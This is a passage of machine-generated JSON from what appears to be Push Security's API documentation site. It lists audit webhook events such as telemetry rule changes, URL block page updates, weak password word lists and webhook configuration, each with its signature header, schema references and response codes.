Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_717"}},"schemaId":"schema_717","pointer":"/paths/telemetry-rule-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"telemetry-rule-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_717"}},"responseCodes":["2XX"],"pointer":"telemetry-rule-updated","href":"audit/telemetry-rule-updated-event","openApiOperationId":"telemetry-rule-updated-event","summary":"Telemetry rule updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_717","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_717"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/telemetry-rule-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/telemetry-rule-updated-event"}],"panels":[]}]},"httpPath":"telemetry-rule-updated"},{"label":"Telemetry rule removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/telemetry-rule-removed-event","routeSlug":"/webhooks-v1/audit/telemetry-rule-removed-event","metadata":{"seo":{"title":"Telemetry rule removed","description":"An admin user has removed a telemetry rule."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"telemetry-rule-removed-event","name":"Telemetry rule removed","isWebhook":true,"pointer":"/paths/telemetry-rule-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Telemetry rule removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has removed a telemetry rule."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/telemetry-rule-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_718"}},"schemaId":"schema_718","pointer":"/paths/telemetry-rule-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"telemetry-rule-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_718"}},"responseCodes":["2XX"],"pointer":"telemetry-rule-removed","href":"audit/telemetry-rule-removed-event","openApiOperationId":"telemetry-rule-removed-event","summary":"Telemetry rule removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_718","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_718"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/telemetry-rule-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/telemetry-rule-removed-event"}],"panels":[]}]},"httpPath":"telemetry-rule-removed"},{"label":"Telemetry rule toggled","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/telemetry-rule-toggled-event","routeSlug":"/webhooks-v1/audit/telemetry-rule-toggled-event","metadata":{"seo":{"title":"Telemetry rule toggled","description":"An admin user has enabled or disabled a telemetry rule."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"telemetry-rule-toggled-event","name":"Telemetry rule toggled","isWebhook":true,"pointer":"/paths/telemetry-rule-toggled/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Telemetry rule toggled","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has enabled or disabled a telemetry rule."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/telemetry-rule-toggled/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_719"}},"schemaId":"schema_719","pointer":"/paths/telemetry-rule-toggled/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"telemetry-rule-toggled","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_719"}},"responseCodes":["2XX"],"pointer":"telemetry-rule-toggled","href":"audit/telemetry-rule-toggled-event","openApiOperationId":"telemetry-rule-toggled-event","summary":"Telemetry rule toggled"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_719","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_719"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/telemetry-rule-toggled/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/telemetry-rule-toggled-event"}],"panels":[]}]},"httpPath":"telemetry-rule-toggled"},{"label":"Telemetry rule reordered","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/telemetry-rule-reordered-event","routeSlug":"/webhooks-v1/audit/telemetry-rule-reordered-event","metadata":{"seo":{"title":"Telemetry rule reordered","description":"An admin user has reordered a new telemetry rule."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"telemetry-rule-reordered-event","name":"Telemetry rule reordered","isWebhook":true,"pointer":"/paths/telemetry-rule-reordered/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Telemetry rule reordered","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has reordered a new telemetry rule."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/telemetry-rule-reordered/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_720"}},"schemaId":"schema_720","pointer":"/paths/telemetry-rule-reordered/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"telemetry-rule-reordered","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_720"}},"responseCodes":["2XX"],"pointer":"telemetry-rule-reordered","href":"audit/telemetry-rule-reordered-event","openApiOperationId":"telemetry-rule-reordered-event","summary":"Telemetry rule reordered"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_720","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_720"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/telemetry-rule-reordered/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/telemetry-rule-reordered-event"}],"panels":[]}]},"httpPath":"telemetry-rule-reordered"},{"label":"Unsupported app support requested","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/unsupported-app-support-requested-event","routeSlug":"/webhooks-v1/audit/unsupported-app-support-requested-event","metadata":{"seo":{"title":"Unsupported app support requested","description":"Support for an unsupported app has been requested."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"unsupported-app-support-requested-event","name":"Unsupported app support requested","isWebhook":true,"pointer":"/paths/unsupported-app-support-requested/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Unsupported app support requested","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"Support for an unsupported app has been requested."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/unsupported-app-support-requested/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_721"}},"schemaId":"schema_721","pointer":"/paths/unsupported-app-support-requested/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"unsupported-app-support-requested","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_721"}},"responseCodes":["2XX"],"pointer":"unsupported-app-support-requested","href":"audit/unsupported-app-support-requested-event","openApiOperationId":"unsupported-app-support-requested-event","summary":"Unsupported app support requested"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_721","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_721"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/unsupported-app-support-requested/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/unsupported-app-support-requested-event"}],"panels":[]}]},"httpPath":"unsupported-app-support-requested"},{"label":"Unsupported app support request cancelled","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/unsupported-app-support-request-cancelled-event","routeSlug":"/webhooks-v1/audit/unsupported-app-support-request-cancelled-event","metadata":{"seo":{"title":"Unsupported app support request cancelled","description":"Support request for an unsupported app has been cancelled."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"unsupported-app-support-request-cancelled-event","name":"Unsupported app support request cancelled","isWebhook":true,"pointer":"/paths/unsupported-app-support-request-cancelled/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Unsupported app support request cancelled","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"Support request for an unsupported app has been cancelled."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/unsupported-app-support-request-cancelled/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_722"}},"schemaId":"schema_722","pointer":"/paths/unsupported-app-support-request-cancelled/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"unsupported-app-support-request-cancelled","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_722"}},"responseCodes":["2XX"],"pointer":"unsupported-app-support-request-cancelled","href":"audit/unsupported-app-support-request-cancelled-event","openApiOperationId":"unsupported-app-support-request-cancelled-event","summary":"Unsupported app support request cancelled"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_722","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_722"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/unsupported-app-support-request-cancelled/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/unsupported-app-support-request-cancelled-event"}],"panels":[]}]},"httpPath":"unsupported-app-support-request-cancelled"},{"label":"URL block page updated","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/url-block-page-updated-event","routeSlug":"/webhooks-v1/audit/url-block-page-updated-event","metadata":{"seo":{"title":"URL block page updated","description":"An admin user updated the contents of the page shown when access to a URL is blocked by the URL blocking control."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"url-block-page-updated-event","name":"URL block page updated","isWebhook":true,"pointer":"/paths/url-block-page-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"URL block page updated","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user updated the contents of the page shown when access to a URL is blocked by the URL blocking control."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/url-block-page-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_723"}},"schemaId":"schema_723","pointer":"/paths/url-block-page-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"url-block-page-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_723"}},"responseCodes":["2XX"],"pointer":"url-block-page-updated","href":"audit/url-block-page-updated-event","openApiOperationId":"url-block-page-updated-event","summary":"URL block page updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_723","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_723"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/url-block-page-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/url-block-page-updated-event"}],"panels":[]}]},"httpPath":"url-block-page-updated"},{"label":"Weak password custom words added","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/weak-password-custom-words-added-event","routeSlug":"/webhooks-v1/audit/weak-password-custom-words-added-event","metadata":{"seo":{"title":"Weak password custom words added","description":"An admin user has added custom words to the weak password check."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"weak-password-custom-words-added-event","name":"Weak password custom words added","isWebhook":true,"pointer":"/paths/weak-password-custom-words-added/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Weak password custom words added","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has added custom words to the weak password check."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/weak-password-custom-words-added/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_724"}},"schemaId":"schema_724","pointer":"/paths/weak-password-custom-words-added/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"weak-password-custom-words-added","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_724"}},"responseCodes":["2XX"],"pointer":"weak-password-custom-words-added","href":"audit/weak-password-custom-words-added-event","openApiOperationId":"weak-password-custom-words-added-event","summary":"Weak password custom words added"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_724","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_724"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/weak-password-custom-words-added/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/weak-password-custom-words-added-event"}],"panels":[]}]},"httpPath":"weak-password-custom-words-added"},{"label":"Weak password custom words removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/weak-password-custom-words-removed-event","routeSlug":"/webhooks-v1/audit/weak-password-custom-words-removed-event","metadata":{"seo":{"title":"Weak password custom words removed","description":"An admin user has removed custom words from the weak password check."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"weak-password-custom-words-removed-event","name":"Weak password custom words removed","isWebhook":true,"pointer":"/paths/weak-password-custom-words-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Weak password custom words removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has removed custom words from the weak password check."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/weak-password-custom-words-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_725"}},"schemaId":"schema_725","pointer":"/paths/weak-password-custom-words-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"weak-password-custom-words-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_725"}},"responseCodes":["2XX"],"pointer":"weak-password-custom-words-removed","href":"audit/weak-password-custom-words-removed-event","openApiOperationId":"weak-password-custom-words-removed-event","summary":"Weak password custom words removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_725","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_725"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/weak-password-custom-words-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/weak-password-custom-words-removed-event"}],"panels":[]}]},"httpPath":"weak-password-custom-words-removed"},{"label":"Webhook added","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/webhook-added-event","routeSlug":"/webhooks-v1/audit/webhook-added-event","metadata":{"seo":{"title":"Webhook added","description":"An admin user has configured a new webhook URL."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"webhook-added-event","name":"Webhook added","isWebhook":true,"pointer":"/paths/webhook-added/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Webhook added","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has configured a new webhook URL."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/webhook-added/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_726"}},"schemaId":"schema_726","pointer":"/paths/webhook-added/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"webhook-added","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_726"}},"responseCodes":["2XX"],"pointer":"webhook-added","href":"audit/webhook-added-event","openApiOperationId":"webhook-added-event","summary":"Webhook added"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_726","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_726"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/webhook-added/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/webhook-added-event"}],"panels":[]}]},"httpPath":"webhook-added"},{"label":"Webhook removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/webhook-removed-event","routeSlug":"/webhooks-v1/audit/webhook-removed-event","metadata":{"seo":{"title":"Webhook removed","description":"An admin user has removed a webhook URL."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"webhook-removed-event","name":"Webhook removed","isWebhook":true,"pointer":"/paths/webhook-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Webhook removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has removed a webhook URL."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/webhook-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_727"}},"schemaId":"schema_727","pointer":"/paths/webhook-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"webhook-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_727"}},"responseCodes":["2XX"],"pointer":"webhook-removed","href":"audit/webhook-removed-event","openApiOperationId":"webhook-removed-event","summary":"Webhook 